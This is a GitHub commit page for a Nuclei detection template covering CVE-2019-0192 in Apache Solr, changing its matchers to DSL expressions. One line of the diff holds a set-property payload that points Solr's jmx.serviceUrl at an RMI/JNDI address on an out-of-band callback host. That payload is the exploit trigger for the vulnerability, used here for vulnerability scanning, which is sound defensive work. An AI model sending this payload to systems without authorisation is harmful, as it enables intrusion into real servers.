Skip to content

Commit b05a784

Browse files
authored
added dsl matchers
1 parent cc31e2c commit b05a784

File tree

1 file changed

+7
-14
lines changed

1 file changed

+7
-14
lines changed

http/cves/2019/CVE-2019-0192.yaml

Lines changed: 7 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -48,18 +48,11 @@ http:
4848
4949
{"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}}
5050
51-
matchers-condition: and
5251
matchers:
53-
- type: word
54-
part: interactsh_protocol
55-
words:
56-
- "dns"
57-
58-
- type: word
59-
part: body
60-
words:
61-
- "javax.management.remote.rmi"
62-
63-
- type: status
64-
status:
65-
- 500
52+
- type: dsl
53+
dsl:
54+
- 'contains(interactsh_protocol, "dns")'
55+
- 'contains(body, "javax.management.remote.rmi")'
56+
- 'contains(content_type, "text/plain")'
57+
- 'status_code == 500'
58+
condition: and

0 commit comments

Comments
 (0)